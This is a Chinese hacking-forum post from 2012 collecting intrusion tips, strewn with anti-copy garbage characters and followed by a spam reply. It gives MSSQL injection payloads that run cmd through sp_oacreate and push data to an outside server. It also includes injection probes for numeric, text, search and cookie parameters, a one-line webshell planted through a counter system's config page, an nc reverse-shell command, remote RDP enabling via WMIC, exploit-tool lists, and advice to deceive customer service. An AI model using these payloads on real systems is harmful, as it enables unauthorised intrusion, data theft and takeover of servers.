找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3976|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关6 g; W  o) O( }) x. T' G, V
  @3 |3 Q  Y$ X% x! N

( {& B7 @& s5 \/ E- l( qSA点数据库分离搞法+语句:3 N: c9 D6 q& J5 u
1 [6 g8 d0 r# I# a7 }8 M
注射点不显错,执行下面三条语句页面都返回正常。
1 X& M1 p  o; D0 w  Land 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')3 ]# \* m. E1 c. p% B0 X
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')' d) h7 x/ m0 h! t
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
; }4 G4 L7 o* y4 A% `+ e, x可以列目录,判断系统为2000,web与数据库分离* ?7 r+ ^% a; O: d9 A' P' [& X  V# t2 \
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。# K: f, C& p9 P  y: X1 S
在注射点上执行
& m/ ?5 _* q4 Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
+ U: G% N$ r2 w7 S2 [7 f页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP, o" j5 l; p  z5 y. a& R2 h
还有我用NC监听得其他端口都没有得到IP。
; G4 F& E0 |2 l% x9 V/ }- H7 B5 G% K  M: @
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。, Y  j" v5 G8 g+ J; k
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
# z+ x9 I1 [9 q0 f, h/ u% A( _, D/ j8 Y/ a: F  @
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
0 x3 w) j7 o1 v" F6 c; J2 B1 l
/ |7 P: |+ @- a' g9 Y9 ]现在就猜想是不是数据库是内网而且不能连外网。+ B9 I7 _3 s" M1 f0 l
- d) y+ s9 T- k/ A! b; F

' @" G( N% C9 ]6 x' caccess导出txt文本代码4 S: X/ i2 a. ^3 F/ }6 F5 a
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
) v& y4 g6 ^, I( o6 C
* d6 L5 g. l( e$ m, C& t5 a7 p. b; b+ o
+ n5 M; G& H3 s1 Y) z, ~9 H- c0 x
自动跳转到指定网站代码头
3 r, p' k% R! I% s: z( Z1 y<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
/ p( U* O/ O% h, N: _0 H
1 q0 S' i8 F* T& W# L7 @/ K4 c8 u" a5 o; g+ V2 D
入侵java or jsp站点时默认配置文件路径:8 V, a# X& K" k3 q9 G; _$ M" I
\web-inf\web.xml
6 X" m& p, K5 R; v$ t/ ctomcat下的配置文件位置:
% Y0 ]: R' c  w: i. U+ w# a" j3 }" Q\conf\server.xml            (前面加上tomcat路径)  K6 U) X4 z% U6 z2 z1 q2 Y6 e4 |+ p
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml. s4 d# v7 O: _; l

: S- M3 ]$ f0 {. X9 `1 _* ^+ p; s% n$ L4 i
8 U( `; c# k6 Z8 e% L
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:3 J; C7 _+ E) p, c; G" B+ Z
-1%23
' j+ b" L3 [2 a  x% }$ h1 _! s>
  A1 s; {; R2 O/ D2 u( _7 O/ T<- Z2 B6 p! v; _
1'+or+'1'='1
( W) v; o# _3 a6 C' K+ I% Jid=8%bf# v+ P& v6 D& f# z# f: G5 g7 N0 c/ s

6 \% {1 F. I/ K/ U7 |4 r% n+ }全新注入点检测试法:
8 X6 X8 f0 F* z* S在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。; P" F7 K) X4 n4 h' L) b' G; m) l

. A9 u. `, i. \2 A- `  m在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
* m- G- C  K8 ?$ j- y* }) o, Y3 ?
搜索型注入判断方法:* e0 i1 H, w: J+ w( H, z
北京%' and '1'='1' and '%'=': K( b; r1 P! s% ^& |) }0 R3 S
北京%' and '1'='2' and '%'='
$ ^7 U. T7 i! ]: R, a6 Q' q% E  p1 l7 e: y/ _1 a$ N4 L7 W% V" F
& B% F; G9 O& I% t
COOKIES注入:
  ?; _- Q! j( U* s& U
& Q6 T4 B/ f, I. z: gjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
, t1 W0 m% V$ F6 W* [. ?  L8 |& |' n
2000专业版查看本地登录用户命令:  e' V8 h- z, {9 y* |: o
net config workstation
2 B7 J4 h3 u0 s  O5 n/ H+ B; \: W. l
: Z) [) [  c1 w- Z2 L" l1 L  V3 c5 ?& s8 R
2003下查看ipsec配置和默认防火墙配置命令:
# V: T" z, i7 ]/ c# q2 J7 Ynetsh firewall show config+ d1 t' V1 X- C) E8 T
netsh ipsec static show all
$ F. e$ X$ {( a& s8 Z: q- l) ~% C( Y% G2 a
不指派指定策略命令:
, s/ x1 y9 q1 ~; ]netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
* ~( N, p6 ^* q' N# Wnetsh ipsec static show policy all  显示策略名
4 A  G" j) C7 s$ X7 \# ]+ r' Q3 A' x4 X" [  I6 Y7 w9 r9 O* ]* `

$ M" w  [' C$ _6 A! G猜管理员后台小技巧:" e/ Z8 z: p+ J2 _# q. ?) g+ j
admin/left.asp
( ]* H* A. u1 V( o6 a4 uadmin/main.asp; d# _. \- N" ?7 S  r6 Y
admin/top.asp
4 ~7 x* W* q; P/ B6 c' Y+ u4 Cadmin/admin.asp
4 }; U4 n  j0 G( L; j$ G! X会现出菜单导航,然后迅雷下载全部链接3 ?8 y' k2 x5 ^

: E* C  R; N# y7 N
. j) _% b! o7 g) y  l! h' B. k+ e社会工程学:% X5 i1 ~4 R* ]; J9 \
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
4 W* q  x6 u! N然后去骗客服
4 d5 q' z$ t! V
, {+ Z- X' D0 _6 f5 m9 X6 P7 w0 C; {; |" x7 n- A0 [
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
# D1 Z! \& Z% |& m查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
) k5 @$ P4 z: w) }0 h  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
8 u- `# d% ?$ G; N7 H- l8 X
- M# T$ o% E( d, N
/ d$ w1 k& ?( {  a* A3 E
' r0 L9 ^7 N# v! }; p9 M6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
$ N7 _6 J# i5 U6 n& Q! B& M. ]- s3 L! h- `3 }. U$ F+ u0 @

* v7 ~$ [- ~$ ^5 U" H
: G9 w9 \9 U0 Q% ]8 N, `  a' p$ }CMD加密注册表位置
, X$ K6 Y9 w2 u# A! ~+ g8 y(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor: ?* ~4 z& {  R1 Q
AutoRun
$ c) Z" O4 K4 {  I7 p0 P8 K; T% c5 C7 E$ t; `) V5 q
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor; d$ o+ {2 j+ W: R, }
AutoRun7 a' D% ~0 U. w+ o! [
2 l7 A' a" m0 Q+ }4 m

1 U& Z" g7 z/ s# T在找注入时搜索Hidden,把他改成test
5 T7 l( ?3 ?$ _. f. o" n: P7 H, t" G: s$ ]4 b

4 z, v1 _) q' J7 W, u! \  z$ Z6 x5 o- s, F2 [; i; u1 E
mstsc /v:IP /console + |- p4 m0 u8 P, _7 n+ R+ X- R2 O
  B% M2 t/ O. ?

8 E: O. C  G, W  f' ~一句话开3389:
5 U8 _& E& \. j5 {- O! }  [8 @& ]
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ' p& F1 P. M& X: N
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
- e/ F# V& r( r! j4 t4 [9 ]
8 K' `2 y. j! d9 o/ V: K, V9 \% H1 t
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
. {, I/ N% c0 |3 z% D, tInsert into admin(user,pwd) values('test','test')$ Q1 n* a; h$ _
; X2 M( F1 ?; j& L: s
* s, W9 d) P2 b" o0 e9 a. d4 i
NC反弹5 [; t3 D6 s) R$ y( \1 c0 @
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
7 B( [$ }3 Z# {/ E然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)- ?& D$ h) y8 H2 C) ~
' b* g$ Q' H! p4 a/ W. I
4 J5 D1 O; h0 v
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 v8 ]' G/ D7 p  c) Q) L0 @/ S6 x% j  V# N0 `) b
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
4 @. {- [2 C: q. a' k( A例如:3 O0 I$ P! H0 L) B9 d
subst k: d:\www\ 用d盘www目录替代k盘/ L" i- F/ \# ?6 A% a. X- \4 f
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表